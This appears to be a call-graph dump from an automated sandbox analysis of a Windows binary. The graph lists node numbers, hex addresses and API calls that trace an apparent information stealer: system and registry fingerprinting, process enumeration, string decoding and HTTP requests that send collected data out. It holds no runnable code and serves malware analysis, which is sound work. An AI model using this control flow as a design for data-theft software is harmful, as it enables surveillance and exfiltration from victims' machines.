14698->14699 14700 65a8a0 lstrcpy 14699->14700 14701 644be7 14700->14701 14702 65a9b0 4 API calls 14701->14702 14703 644c06 14702->14703 14704 65a8a0 lstrcpy 14703->14704 14705 644c0f 14704->14705 14706 65a920 3 API calls 14705->14706 14707 644c2d 14706->14707 14708 65a8a0 lstrcpy 14707->14708 14709 644c36 14708->14709 14710 65a9b0 4 API calls 14709->14710 14711 644c55 14710->14711 14712 65a8a0 lstrcpy 14711->14712 14713 644c5e 14712->14713 14714 65a9b0 4 API calls 14713->14714 14715 644c7d 14714->14715 14716 65a8a0 lstrcpy 14715->14716 14717 644c86 14716->14717 14718 65a920 3 API calls 14717->14718 14719 644ca4 14718->14719 14720 65a8a0 lstrcpy 14719->14720 14721 644cad 14720->14721 14722 65a9b0 4 API calls 14721->14722 14723 644ccc 14722->14723 14724 65a8a0 lstrcpy 14723->14724 14725 644cd5 14724->14725 14726 65a9b0 4 API calls 14725->14726 14727 644cf6 14726->14727 14728 65a8a0 lstrcpy 14727->14728 14729 644cff 14728->14729 14730 65a9b0 4 API calls 14729->14730 14731 644d1f 14730->14731 14732 65a8a0 lstrcpy 14731->14732 14733 644d28 14732->14733 14734 65a9b0 4 API calls 14733->14734 14735 644d47 14734->14735 14736 65a8a0 lstrcpy 14735->14736 14737 644d50 14736->14737 14738 65a920 3 API calls 14737->14738 14739 644d6e 14738->14739 14740 65a8a0 lstrcpy 14739->14740 14741 644d77 14740->14741 14742 65a740 lstrcpy 14741->14742 14743 644d92 14742->14743 14744 65a920 3 API calls 14743->14744 14745 644db3 14744->14745 14746 65a920 3 API calls 14745->14746 14747 644dba 14746->14747 14748 65a8a0 lstrcpy 14747->14748 14749 644dc6 14748->14749 14750 644de7 lstrlen 14749->14750 14751 644dfa 14750->14751 14752 644e03 lstrlen 14751->14752 15689 65aad0 14752->15689 14754 644e13 HttpSendRequestA 14755 644e32 InternetReadFile 14754->14755 14756 644e67 InternetCloseHandle 14755->14756 14761 644e5e 14755->14761 14758 65a800 14756->14758 14758->14680 14759 65a9b0 4 API calls 14759->14761 14760 65a8a0 lstrcpy 14760->14761 14761->14755 14761->14756 14761->14759 14761->14760 15696 65aad0 14762->15696 14764 6517c4 StrCmpCA 14765 6517cf ExitProcess 14764->14765 14767 6517d7 14764->14767 14766 6519c2 14766->13685 14767->14766 14768 6518ad StrCmpCA 14767->14768 14769 6518cf StrCmpCA 14767->14769 14770 6518f1 StrCmpCA 14767->14770 14771 651951 StrCmpCA 14767->14771 14772 651970 StrCmpCA 14767->14772 14773 651913 StrCmpCA 14767->14773 14774 651932 StrCmpCA 14767->14774 14775 65185d StrCmpCA 14767->14775 14776 65187f StrCmpCA 14767->14776 14777 65a820 lstrlen lstrcpy 14767->14777 14768->14767 14769->14767 14770->14767 14771->14767 14772->14767 14773->14767 14774->14767 14775->14767 14776->14767 14777->14767 14779 65a7a0 lstrcpy 14778->14779 14780 645979 14779->14780 14781 6447b0 2 API calls 14780->14781 14782 645985 14781->14782 14783 65a740 lstrcpy 14782->14783 14784 6459ba 14783->14784 14785 65a740 lstrcpy 14784->14785 14786 6459c7 14785->14786 14787 65a740 lstrcpy 14786->14787 14788 6459d4 14787->14788 14789 65a740 lstrcpy 14788->14789 14790 6459e1 14789->14790 14791 65a740 lstrcpy 14790->14791 14792 6459ee InternetOpenA StrCmpCA 14791->14792 14793 645a1d 14792->14793 14794 645fc3 InternetCloseHandle 14793->14794 14795 658b60 3 API calls 14793->14795 14796 645fe0 14794->14796 14797 645a3c 14795->14797 14799 649ac0 4 API calls 14796->14799 14798 65a920 3 API calls 14797->14798 14800 645a4f 14798->14800 14801 645fe6 14799->14801 14802 65a8a0 lstrcpy 14800->14802 14803 65a820 2 API calls 14801->14803 14805 64601f codecvt 14801->14805 14808 645a58 14802->14808 14804 645ffd 14803->14804 14806 65a9b0 4 API calls 14804->14806 14810 65a7a0 lstrcpy 14805->14810 14807 646013 14806->14807 14809 65a8a0 lstrcpy 14807->14809 14811 65a9b0 4 API calls 14808->14811 14809->14805 14819 64604f 14810->14819 14812 645a82 14811->14812 14813 65a8a0 lstrcpy 14812->14813 14814 645a8b 14813->14814 14815 65a9b0 4 API calls 14814->14815 14816 645aaa 14815->14816 14817 65a8a0 lstrcpy 14816->14817 14818 645ab3 14817->14818 14820 65a920 3 API calls 14818->14820 14819->13691 14821 645ad1 14820->14821 14822 65a8a0 lstrcpy 14821->14822 14823 645ada 14822->14823 14824 65a9b0 4 API calls 14823->14824 14825 645af9 14824->14825 14826 65a8a0 lstrcpy 14825->14826 14827 645b02 14826->14827 14828 65a9b0 4 API calls 14827->14828 14829 645b21 14828->14829 14830 65a8a0 lstrcpy 14829->14830 14831 645b2a 14830->14831 14832 65a9b0 4 API calls 14831->14832 14833 645b56 14832->14833 14834 65a920 3 API calls 14833->14834 14835 645b5d 14834->14835 14836 65a8a0 lstrcpy 14835->14836 14837 645b66 14836->14837 14838 645b7c InternetConnectA 14837->14838 14838->14794 14839 645bac HttpOpenRequestA 14838->14839 14841 645fb6 InternetCloseHandle 14839->14841 14842 645c0b 14839->14842 14841->14794 14843 65a9b0 4 API calls 14842->14843 14844 645c1f 14843->14844 14845 65a8a0 lstrcpy 14844->14845 14846 645c28 14845->14846 14847 65a920 3 API calls 14846->14847 14848 645c46 14847->14848 14849 65a8a0 lstrcpy 14848->14849 14850 645c4f 14849->14850 14851 65a9b0 4 API calls 14850->14851 14852 645c6e 14851->14852 14853 65a8a0 lstrcpy 14852->14853 14854 645c77 14853->14854 14855 65a9b0 4 API calls 14854->14855 14856 645c98 14855->14856 14857 65a8a0 lstrcpy 14856->14857 14858 645ca1 14857->14858 14859 65a9b0 4 API calls 14858->14859 14860 645cc1 14859->14860 14861 65a8a0 lstrcpy 14860->14861 14862 645cca 14861->14862 14863 65a9b0 4 API calls 14862->14863 14864 645ce9 14863->14864 14865 65a8a0 lstrcpy 14864->14865 14866 645cf2 14865->14866 14867 65a920 3 API calls 14866->14867 14868 645d10 14867->14868 14869 65a8a0 lstrcpy 14868->14869 14870 645d19 14869->14870 14871 65a9b0 4 API calls 14870->14871 14872 645d38 14871->14872 14873 65a8a0 lstrcpy 14872->14873 14874 645d41 14873->14874 14875 65a9b0 4 API calls 14874->14875 14876 645d60 14875->14876 14877 65a8a0 lstrcpy 14876->14877 14878 645d69 14877->14878 14879 65a920 3 API calls 14878->14879 14880 645d87 14879->14880 14881 65a8a0 lstrcpy 14880->14881 14882 645d90 14881->14882 14883 65a9b0 4 API calls 14882->14883 14884 645daf 14883->14884 14885 65a8a0 lstrcpy 14884->14885 14886 645db8 14885->14886 14887 65a9b0 4 API calls 14886->14887 14888 645dd9 14887->14888 14889 65a8a0 lstrcpy 14888->14889 14890 645de2 14889->14890 14891 65a9b0 4 API calls 14890->14891 14892 645e02 14891->14892 14893 65a8a0 lstrcpy 14892->14893 14894 645e0b 14893->14894 14895 65a9b0 4 API calls 14894->14895 14896 645e2a 14895->14896 14897 65a8a0 lstrcpy 14896->14897 14898 645e33 14897->14898 14899 65a920 3 API calls 14898->14899 14900 645e54 14899->14900 14901 65a8a0 lstrcpy 14900->14901 14902 645e5d 14901->14902 14903 645e70 lstrlen 14902->14903 15697 65aad0 14903->15697 14905 645e81 lstrlen GetProcessHeap RtlAllocateHeap 15698 65aad0 14905->15698 14907 645eae lstrlen 14908 645ebe 14907->14908 14909 645ed7 lstrlen 14908->14909 14910 645ee7 14909->14910 14911 645ef0 lstrlen 14910->14911 14912 645f03 14911->14912 14913 645f1a lstrlen 14912->14913 15699 65aad0 14913->15699 14915 645f2a HttpSendRequestA 14916 645f35 InternetReadFile 14915->14916 14917 645f6a InternetCloseHandle 14916->14917 14921 645f61 14916->14921 14917->14841 14919 65a9b0 4 API calls 14919->14921 14920 65a8a0 lstrcpy 14920->14921 14921->14916 14921->14917 14921->14919 14921->14920 14923 651077 14922->14923 14924 651151 14923->14924 14925 65a820 lstrlen lstrcpy 14923->14925 14924->13693 14925->14923 14927 650db7 14926->14927 14928 650f17 14927->14928 14929 650ea4 StrCmpCA 14927->14929 14930 650e27 StrCmpCA 14927->14930 14931 650e67 StrCmpCA 14927->14931 14932 65a820 lstrlen lstrcpy 14927->14932 14928->13701 14929->14927 14930->14927 14931->14927 14932->14927 14936 650f67 14933->14936 14934 651044 14934->13709 14935 650fb2 StrCmpCA 14935->14936 14936->14934 14936->14935 14937 65a820 lstrlen lstrcpy 14936->14937 14937->14936 14939 65a740 lstrcpy 14938->14939 14940 651a26 14939->14940 14941 65a9b0 4 API calls 14940->14941 14942 651a37 14941->14942 14943 65a8a0 lstrcpy 14942->14943 14944 651a40 14943->14944 14945 65a9b0 4 API calls 14944->14945 14946 651a5b 14945->14946 14947 65a8a0 lstrcpy 14946->14947 14948 651a64 14947->14948 14949 65a9b0 4 API calls 14948->14949 14950 651a7d 14949->14950 14951 65a8a0 lstrcpy 14950->14951 14952 651a86 14951->14952 14953 65a9b0 4 API calls 14952->14953 14954 651aa1 14953->14954 14955 65a8a0 lstrcpy 14954->14955 14956 651aaa 14955->14956 14957 65a9b0 4 API calls 14956->14957 14958 651ac3 14957->14958 14959 65a8a0 lstrcpy 14958->14959 14960 651acc 14959->14960 14961 65a9b0 4 API calls 14960->14961 14962 651ae7 14961->14962 14963 65a8a0 lstrcpy 14962->14963 14964 651af0 14963->14964 14965 65a9b0 4 API calls 14964->14965 14966 651b09 14965->14966 14967 65a8a0 lstrcpy 14966->14967 14968 651b12 14967->14968 14969 65a9b0 4 API calls 14968->14969 14970 651b2d 14969->14970 14971 65a8a0 lstrcpy 14970->14971 14972 651b36 14971->14972 14973 65a9b0 4 API calls 14972->14973 14974 651b4f 14973->14974 14975 65a8a0 lstrcpy 14974->14975 14976 651b58 14975->14976 14977 65a9b0 4 API calls 14976->14977 14978 651b76 14977->14978 14979 65a8a0 lstrcpy 14978->14979 14980 651b7f 14979->14980 14981 657500 6 API calls 14980->14981 14982 651b96 14981->14982 14983 65a920 3 API calls 14982->14983 14984 651ba9 14983->14984 14985 65a8a0 lstrcpy 14984->14985 14986 651bb2 14985->14986 14987 65a9b0 4 API calls 14986->14987 14988 651bdc 14987->14988 14989 65a8a0 lstrcpy 14988->14989 14990 651be5 14989->14990 14991 65a9b0 4 API calls 14990->14991 14992 651c05 14991->14992 14993 65a8a0 lstrcpy 14992->14993 14994 651c0e 14993->14994 15700 657690 GetProcessHeap RtlAllocateHeap 14994->15700 14997 65a9b0 4 API calls 14998 651c2e 14997->14998 14999 65a8a0 lstrcpy 14998->14999 15000 651c37 14999->15000 15001 65a9b0 4 API calls 15000->15001 15002 651c56 15001->15002 15003 65a8a0 lstrcpy 15002->15003 15004 651c5f 15003->15004 15005 65a9b0 4 API calls 15004->15005 15006 651c80 15005->15006 15007 65a8a0 lstrcpy 15006->15007 15008 651c89 15007->15008 15707 6577c0 GetCurrentProcess IsWow64Process 15008->15707 15011 65a9b0 4 API calls 15012 651ca9 15011->15012 15013 65a8a0 lstrcpy 15012->15013 15014 651cb2 15013->15014 15015 65a9b0 4 API calls 15014->15015 15016 651cd1 15015->15016 15017 65a8a0 lstrcpy 15016->15017 15018 651cda 15017->15018 15019 65a9b0 4 API calls 15018->15019 15020 651cfb 15019->15020 15021 65a8a0 lstrcpy 15020->15021 15022 651d04 15021->15022 15023 657850 3 API calls 15022->15023 15024 651d14 15023->15024 15025 65a9b0 4 API calls 15024->15025 15026 651d24 15025->15026 15027 65a8a0 lstrcpy 15026->15027 15028 651d2d 15027->15028 15029 65a9b0 4 API calls 15028->15029 15030 651d4c 15029->15030 15031 65a8a0 lstrcpy 15030->15031 15032 651d55 15031->15032 15033 65a9b0 4 API calls 15032->15033 15034 651d75 15033->15034 15035 65a8a0 lstrcpy 15034->15035 15036 651d7e 15035->15036 15037 6578e0 3 API calls 15036->15037 15038 651d8e 15037->15038 15039 65a9b0 4 API calls 15038->15039 15040 651d9e 15039->15040 15041 65a8a0 lstrcpy 15040->15041 15042 651da7 15041->15042 15043 65a9b0 4 API calls 15042->15043 15044 651dc6 15043->15044 15045 65a8a0 lstrcpy 15044->15045 15046 651dcf 15045->15046 15047 65a9b0 4 API calls 15046->15047 15048 651df0 15047->15048 15049 65a8a0 lstrcpy 15048->15049 15050 651df9 15049->15050 15709 657980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15050->15709 15053 65a9b0 4 API calls 15054 651e19 15053->15054 15055 65a8a0 lstrcpy 15054->15055 15056 651e22 15055->15056 15057 65a9b0 4 API calls 15056->15057 15058 651e41 15057->15058 15059 65a8a0 lstrcpy 15058->15059 15060 651e4a 15059->15060 15061 65a9b0 4 API calls 15060->15061 15062 651e6b 15061->15062 15063 65a8a0 lstrcpy 15062->15063 15064 651e74 15063->15064 15711 657a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15064->15711 15067 65a9b0 4 API calls 15068 651e94 15067->15068 15069 65a8a0 lstrcpy 15068->15069 15070 651e9d 15069->15070 15071 65a9b0 4 API calls 15070->15071 15072 651ebc 15071->15072 15073 65a8a0 lstrcpy 15072->15073 15074 651ec5 15073->15074 15075 65a9b0 4 API calls 15074->15075 15076 651ee5 15075->15076 15077 65a8a0 lstrcpy 15076->15077 15078 651eee 15077->15078 15714 657b00 GetUserDefaultLocaleName 15078->15714 15081 65a9b0 4 API calls 15082 651f0e 15081->15082 15083 65a8a0 lstrcpy 15082->15083 15084 651f17 15083->15084 15085 65a9b0 4 API calls 15084->15085 15086 651f36 15085->15086 15087 65a8a0 lstrcpy 15086->15087 15088 651f3f 15087->15088 15089 65a9b0 4 API calls 15088->15089 15090 651f60 15089->15090 15091 65a8a0 lstrcpy 15090->15091 15092 651f69 15091->15092 15718 657b90 15092->15718 15094 651f80 15095 65a920 3 API calls 15094->15095 15096 651f93 15095->15096 15097 65a8a0 lstrcpy 15096->15097 15098 651f9c 15097->15098 15099 65a9b0 4 API calls 15098->15099 15100 651fc6 15099->15100 15101 65a8a0 lstrcpy 15100->15101 15102 651fcf 15101->15102 15103 65a9b0 4 API calls 15102->15103 15104 651fef 15103->15104 15105 65a8a0 lstrcpy 15104->15105 15106 651ff8 15105->15106 15730 657d80 GetSystemPowerStatus 15106->15730 15109 65a9b0 4 API calls 15110 652018 15109->15110 15111 65a8a0 lstrcpy 15110->15111 15112 652021 15111->15112 15113 65a9b0 4 API calls 15112->15113 15114 652040 15113->15114 15115 65a8a0 lstrcpy 15114->15115 15116 652049 15115->15116 15117 65a9b0 4 API calls 15116->15117 15118 65206a 15117->15118 15119 65a8a0 lstrcpy 15118->15119 15120 652073 15119->15120 15121 65207e GetCurrentProcessId 15120->15121 15732 659470 OpenProcess 15121->15732 15124 65a920 3 API calls 15125 6520a4 15124->15125 15126 65a8a0 lstrcpy 15125->15126 15127 6520ad 15126->15127 15128 65a9b0 4 API calls 15127->15128 15129 6520d7 15128->15129 15130 65a8a0 lstrcpy 15129->15130 15131 6520e0 15130->15131 15132 65a9b0 4 API calls 15131->15132 15133 652100 15132->15133 15134 65a8a0 lstrcpy 15133->15134 15135 652109 15134->15135 15737 657e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15135->15737 15138 65a9b0 4 API calls 15139 652129 15138->15139 15140 65a8a0 lstrcpy 15139->15140 15141 652132 15140->15141 15142 65a9b0 4 API calls 15141->15142 15143 652151 15142->15143 15144 65a8a0 lstrcpy 15143->15144 15145 65215a 15144->15145 15146 65a9b0 4 API calls 15145->15146 15147 65217b 15146->15147 15148 65a8a0 lstrcpy 15147->15148 15149 652184 15148->15149 15741 657f60 15149->15741 15152 65a9b0 4 API calls 15153 6521a4 15152->15153 15154 65a8a0 lstrcpy 15153->15154 15155 6521ad 15154->15155 15156 65a9b0 4 API calls 15155->15156 15157 6521cc 15156->15157 15158 65a8a0 lstrcpy 15157->15158 15159 6521d5 15158->15159 15160 65a9b0 4 API calls 15159->15160 15161 6521f6 15160->15161 15162 65a8a0 lstrcpy 15161->15162 15163 6521ff 15162->15163 15754 657ed0 GetSystemInfo wsprintfA 15163->15754 15166 65a9b0 4 API calls 15167 65221f 15166->15167 15168 65a8a0 lstrcpy 15167->15168 15169 652228 15168->15169 15170 65a9b0 4 API calls 15169->15170 15171 652247 15170->15171 15172 65a8a0 lstrcpy 15171->15172 15173 652250 15172->15173 15174 65a9b0 4 API calls 15173->15174 15175 652270 15174->15175 15176 65a8a0 lstrcpy 15175->15176 15177 652279 15176->15177 15756 658100 GetProcessHeap RtlAllocateHeap 15177->15756 15180 65a9b0 4 API calls 15181 652299 15180->15181 15182 65a8a0 lstrcpy 15181->15182 15183 6522a2 15182->15183 15184 65a9b0 4 API calls 15183->15184 15185 6522c1 15184->15185 15186 65a8a0 lstrcpy 15185->15186 15187 6522ca 15186->15187 15188 65a9b0 4 API calls 15187->15188 15189 6522eb 15188->15189 15190 65a8a0 lstrcpy 15189->15190 15191 6522f4 15190->15191 15762 6587c0 15191->15762 15194 65a920 3 API calls 15195 65231e 15194->15195 15196 65a8a0 lstrcpy 15195->15196 15197 652327 15196->15197 15198 65a9b0 4 API calls 15197->15198 15199 652351 15198->15199 15200 65a8a0 lstrcpy 15199->15200 15201 65235a 15200->15201 15202 65a9b0 4 API calls 15201->15202 15203 65237a 15202->15203 15204 65a8a0 lstrcpy 15203->15204 15205 652383 15204->15205 15206 65a9b0 4 API calls 15205->15206 15207 6523a2 15206->15207 15208 65a8a0 lstrcpy 15207->15208 15209 6523ab 15208->15209 15767 6581f0 15209->15767 15211 6523c2 15212 65a920 3 API calls 15211->15212 15213 6523d5 15212->15213 15214 65a8a0 lstrcpy 15213->15214 15215 6523de 15214->15215 15216 65a9b0 4 API calls 15215->15216 15217 65240a 15216->15217 15218 65a8a0 lstrcpy 15217->15218 15219 652413 15218->15219 15220 65a9b0 4 API calls 15219->15220 15221 652432 15220->15221 15222 65a8a0 lstrcpy 15221->15222 15223 65243b 15222->15223 15224 65a9b0 4 API calls 15223->15224 15225 65245c 15224->15225 15226 65a8a0 lstrcpy 15225->15226 15227 652465 15226->15227 15228 65a9b0 4 API calls 15227->15228 15229 652484 15228->15229 15230 65a8a0 lstrcpy 15229->15230 15231 65248d 15230->15231 15232 65a9b0 4 API calls 15231->15232 15233 6524ae 15232->15233 15234 65a8a0 lstrcpy 15233->15234 15235 6524b7 15234->15235 15775 658320 15235->15775 15237 6524d3 15238 65a920 3 API calls 15237->15238 15239 6524e6 15238->15239 15240 65a8a0 lstrcpy 15239->15240 15241 6524ef 15240->15241 15242 65a9b0 4 API calls 15241->15242 15243 652519 15242->15243 15244 65a8a0 lstrcpy 15243->15244 15245 652522 15244->15245 15246 65a9b0 4 API calls 15245->15246 15247 652543 15246->15247 15248 65a8a0 lstrcpy 15247->15248 15249 65254c 15248->15249 15250 658320 17 API calls 15249->15250 15251 652568 15250->15251 15252 65a920 3 API calls 15251->15252 15253 65257b 15252->15253 15254 65a8a0 lstrcpy 15253->15254 15255 652584 15254->15255 15256 65a9b0 4 API calls 15255->15256 15257 6525ae 15256->15257 15258 65a8a0 lstrcpy 15257->15258 15259 6525b7 15258->15259 15260 65a9b0 4 API calls 15259->15260 15261 6525d6 15260->15261 15262 65a8a0 lstrcpy 15261->15262 15263 6525df 15262->15263 15264 65a9b0 4 API calls 15263->15264 15265 652600 15264->15265 15266 65a8a0 lstrcpy 15265->15266 15267 652609 15266->15267 15811 658680 15267->15811 15269 652620 15270 65a920 3 API calls 15269->15270 15271 652633 15270->15271 15272 65a8a0 lstrcpy 15271->15272 15273 65263c 15272->15273 15274 65265a lstrlen 15273->15274 15275 65266a 15274->15275 15276 65a740 lstrcpy 15275->15276 15277 65267c 15276->15277 15278 641590 lstrcpy 15277->15278 15279 65268d 15278->15279 15821 655190 15279->15821 15281 652699 15281->13713 16009 65aad0 15282->16009 15284 645009 InternetOpenUrlA 15285 645021 15284->15285 15286 6450a0 InternetCloseHandle InternetCloseHandle 15285->15286 15287 64502a InternetReadFile 15285->15287 15288 6450ec 15286->15288 15287->15285 15288->13717 16010 6498d0 15289->16010 15291 650759 15292 65077d 15291->15292 15293 650a38 15291->15293 15295 650799 StrCmpCA 15292->15295 15294 641590 lstrcpy 15293->15294 15296 650a49 15294->15296 15297 6507a8 15295->15297 15322 650843 15295->15322 16186 650250 15296->16186 15300 65a7a0 lstrcpy 15297->15300 15302 6507c3 15300->15302 15301 650865 StrCmpCA 15303 650874 15301->15303 15341 65096b 15301->15341 15304 641590 lstrcpy 15302->15304 15305 65a740 lstrcpy 15303->15305 15306 65080c 15304->15306 15308 650881 15305->15308 15309 65a7a0 lstrcpy 15306->15309 15307 65099c StrCmpCA 15310 6509ab 15307->15310 15330 650a2d 15307->15330 15311 65a9b0 4 API calls 15308->15311 15312 650823 15309->15312 15314 641590 lstrcpy 15310->15314 15315 6508ac 15311->15315 15313 65a7a0 lstrcpy 15312->15313 15316 65083e 15313->15316 15317 6509f4 15314->15317 15318 65a920 3 API calls 15315->15318 16013 64fb00 15316->16013 15320 65a7a0 lstrcpy 15317->15320 15321 6508b3 15318->15321 15323 650a0d 15320->15323 15324 65a9b0 4 API calls 15321->15324 15322->15301 15325 65a7a0 lstrcpy 15323->15325 15326 6508ba 15324->15326 15328 650a28 15325->15328 16129 650030 15328->16129 15330->13721 15341->15307 15661 65a7a0 lstrcpy 15660->15661 15662 641683 15661->15662 15663 65a7a0 lstrcpy 15662->15663 15664 641695 15663->15664 15665 65a7a0 lstrcpy 15664->15665 15666 6416a7 15665->15666 15667 65a7a0 lstrcpy 15666->15667 15668 6415a3 15667->15668 15668->14544 15670 6447c6 15669->15670 15671 644838 lstrlen 15670->15671 15695 65aad0 15671->15695 15673 644848 InternetCrackUrlA 15674 644867 15673->15674 15674->14621 15676 65a740 lstrcpy 15675->15676 15677 658b74 15676->15677 15678 65a740 lstrcpy 15677->15678 15679 658b82 GetSystemTime 15678->15679 15681 658b99 15679->15681 15680 65a7a0 lstrcpy 15682 658bfc 15680->15682 15681->15680 15682->14636 15685 65a931 15683->15685 15684 65a988 15686 65a7a0 lstrcpy 15684->15686 15685->15684 15687 65a968 lstrcpy lstrcat 15685->15687 15688 65a994 15686->15688 15687->15684 15688->14639 15689->14754 15691 649af9 LocalAlloc 15690->15691 15692 644eee 15690->15692 15691->15692 15693 649b14 CryptStringToBinaryA 15691->15693 15692->14642 15692->14645 15693->15692 15694 649b39 LocalFree 15693->15694 15694->15692 15695->15673 15696->14764 15697->14905 15698->14907 15699->14915 15828 6577a0 15700->15828 15703 6576c6 RegOpenKeyExA 15705 657704 RegCloseKey 15703->15705 15706 6576e7 RegQueryValueExA 15703->15706 15704 651c1e 15704->14997 15705->15704 15706->15705 15708 651c99 15707->15708 15708->15011 15710 651e09 15709->15710 15710->15053 15712 651e84 15711->15712 15713 657a9a wsprintfA 15711->15713 15712->15067 15713->15712 15715 657b4d 15714->15715 15716 651efe 15714->15716 15835 658d20 LocalAlloc CharToOemW 15715->15835 15716->15081 15719 65a740 lstrcpy 15718->15719 15720 657bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15719->15720 15727 657c25 15720->15727 15721 657c46 GetLocaleInfoA 15721->15727 15722 657d18 15723 657d1e LocalFree 15722->15723 15724 657d28 15722->15724 15723->15724 15726 65a7a0 lstrcpy 15724->15726 15725 65a9b0 lstrcpy lstrlen lstrcpy lstrcat 15725->15727 15729 657d37 15726->15729 15727->15721 15727->15722 15727->15725 15728 65a8a0 lstrcpy 15727->15728 15728->15727 15729->15094 15731 652008 15730->15731 15731->15109 15733 6594b5 15732->15733 15734 659493 GetModuleFileNameExA CloseHandle 15732->15734 15735 65a740 lstrcpy 15733->15735 15734->15733 15736 652091 15735->15736 15736->15124 15738 657e68 RegQueryValueExA 15737->15738 15740 652119 15737->15740 15739 657e8e RegCloseKey 15738->15739 15739->15740 15740->15138 15742 657fb9 GetLogicalProcessorInformationEx 15741->15742 15743 657fd8 GetLastError 15742->15743 15744 658029 15742->15744 15747 658022 15743->15747 15753 657fe3 15743->15753 15749 6589f0 2 API calls 15744->15749 15748 652194 15747->15748 15750 6589f0 2 API calls 15747->15750 15748->15152 15751 65807b 15749->15751 15750->15748 15751->15747 15752 658084 wsprintfA 15751->15752 15752->15748 15753->15742 15753->15748 15836 6589f0 15753->15836 15839 658a10 GetProcessHeap RtlAllocateHeap 15753->15839 15755 65220f 15754->15755 15755->15166 15757 6589b0 15756->15757 15758 65814d GlobalMemoryStatusEx 15757->15758 15761 658163 __aulldiv 15758->15761 15759 65819b wsprintfA 15760 652289 15759->15760 15760->15180 15761->15759 15763 6587fb GetProcessHeap RtlAllocateHeap wsprintfA 15762->15763 15765 65a740 lstrcpy 15763->15765 15766 65230b 15765->15766 15766->15194 15768 65a740 lstrcpy 15767->15768 15774 658229 15768->15774 15769 658263 15770 65a7a0 lstrcpy 15769->15770 15772 6582dc 15770->15772 15771 65a9b0 lstrcpy lstrlen lstrcpy lstrcat 15771->15774 15772->15211 15773 65a8a0 lstrcpy 15773->15774 15774->15769 15774->15771 15774->15773 15776 65a740 lstrcpy 15775->15776 15777 65835c RegOpenKeyExA 15776->15777 15778 6583d0 15777->15778 15779 6583ae 15777->15779 15781 658613 RegCloseKey 15778->15781 15782 6583f8 RegEnumKeyExA 15778->15782 15780 65a7a0 lstrcpy 15779->15780 15791 6583bd 15780->15791 15785 65a7a0 lstrcpy 15781->15785 15783 65843f wsprintfA RegOpenKeyExA 15782->15783 15784 65860e 15782->15784 15786 658485 RegCloseKey RegCloseKey 15783->15786 15787 6584c1 RegQueryValueExA 15783->15787 15784->15781 15785->15791 15788 65a7a0 lstrcpy 15786->15788 15789 658601 RegCloseKey 15787->15789 15790 6584fa lstrlen 15787->15790 15788->15791 15789->15784 15790->15789 15792 658510 15790->15792 15791->15237 15793 65a9b0 4 API calls 15792->15793 15794 658527 15793->15794 15795 65a8a0 lstrcpy 15794->15795 15796 658533 15795->15796 15797 65a9b0 4 API calls 15796->15797 15798 658557 15797->15798 15799 65a8a0 lstrcpy 15798->15799 15800 658563 15799->15800 15801 65856e RegQueryValueExA 15800->15801 15801->15789 15802 6585a3 15801->15802 15803 65a9b0 4 API calls 15802->15803 15804 6585ba 15803->15804 15805 65a8a0 lstrcpy 15804->15805 15806 6585c6 15805->15806 15807 65a9b0 4 API calls 15806->15807 15808 6585ea 15807->15808 15809 65a8a0 lstrcpy 15808->15809 15810 6585f6 15809->15810 15810->15789 15812 65a740 lstrcpy 15811->15812 15813 6586bc CreateToolhelp32Snapshot Process32First 15812->15813 15814 65875d CloseHandle 15813->15814 15815 6586e8 Process32Next 15813->15815 15816 65a7a0 lstrcpy 15814->15816 15815->15814 15820 6586fd 15815->15820 15819 658776 15816->15819 15817 65a9b0 lstrcpy lstrlen lstrcpy lstrcat 15817->15820 15818 65a8a0 lstrcpy 15818->15820 15819->15269 15820->15815 15820->15817 15820->15818 15822 65a7a0 lstrcpy 15821->15822 15823 6551b5 15822->15823 15824 641590 lstrcpy 15823->15824 15825 6551c6 15824->15825 15840 645100 15825->15840 15827 6551cf 15827->15281 15831 657720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15828->15831 15830 6576b9 15830->15703 15830->15704 15832 657765 RegQueryValueExA 15831->15832 15833 657780 RegCloseKey 15831->15833 15832->15833 15834 657793 15833->15834 15834->15830 15835->15716 15837 658a0c 15836->15837 15838 6589f9 GetProcessHeap HeapFree 15836->15838 15837->15753 15838->15837 15839->15753 15841 65a7a0 lstrcpy 15840->15841 15842 645119 15841->15842 15843 6447b0 2 API calls 15842->15843 15844 645125 15843->15844 16000 658ea0 15844->16000 15846 645184 15847 645192 lstrlen 15846->15847 15848 6451a5 15847->15848 15849 658ea0 4 API calls 15848->15849 15850 6451b6 15849->15850 15851 65a740 lstrcpy 15850->15851 15852 6451c9 15851->15852 15853 65a740 lstrcpy 15852->15853 15854 6451d6 15853->15854 15855 65a740 lstrcpy 15854->15855 15856 6451e3 15855->15856 15857 65a740 lstrcpy 15856->15857 15858 6451f0 15857->15858 15859 65a740 lstrcpy 15858->15859 15860 6451fd InternetOpenA StrCmpCA 15859->15860 15861 64522f 15860->15861 15862 6458c4 InternetCloseHandle 15861->15862 15863 658b60 3 API calls 15861->15863 15869 6458d9 codecvt 15862->15869 15864 64524e 15863->15864 15865 65a920 3 API calls 15864->15865 15866 645261 15865->15866 15867 65a8a0 lstrcpy 15866->15867 15868 64526a 15867->15868 15870 65a9b0 4 API calls 15868->15870 15873 65a7a0 lstrcpy 15869->15873 15871 6452ab 15870->15871 15872 65a920 3 API calls 15871->15872 15874 6452b2 15872->15874 15881 645913 15873->15881 15875 65a9b0 4 API calls 15874->15875 15876 6452b9 15875->15876 15877 65a8a0 lstrcpy 15876->15877 15878 6452c2 15877->15878 15879 65a9b0 4 API calls 15878->15879 15880 645303 15879->15880 15882 65a920 3 API calls 15880->15882 15881->15827 15883 64530a 15882->15883 15884 65a8a0 lstrcpy 15883->15884 15885 645313 15884->15885 15886 645329 InternetConnectA 15885->15886 15886->15862 15887 645359 HttpOpenRequestA 15886->15887 15889 6458b7 InternetCloseHandle 15887->15889 15890 6453b7 15887->15890 15889->15862 15891 65a9b0 4 API calls 15890->15891 15892 6453cb 15891->15892 15893 65a8a0 lstrcpy 15892->15893 15894 6453d4 15893->15894 15895 65a920 3 API calls 15894->15895 15896 6453f2 15895->15896 15897 65a8a0 lstrcpy 15896->15897 15898 6453fb 15897->15898 15899 65a9b0 4 API calls 15898->15899 15900 64541a 15899->15900 15901 65a8a0 lstrcpy 15900->15901 15902 645423 15901->15902 15903 65a9b0 4 API calls 15902->15903 15904 645444 15903->15904 15905 65a8a0 lstrcpy 15904->15905 15906 64544d 15905->15906 15907 65a9b0 4 API calls 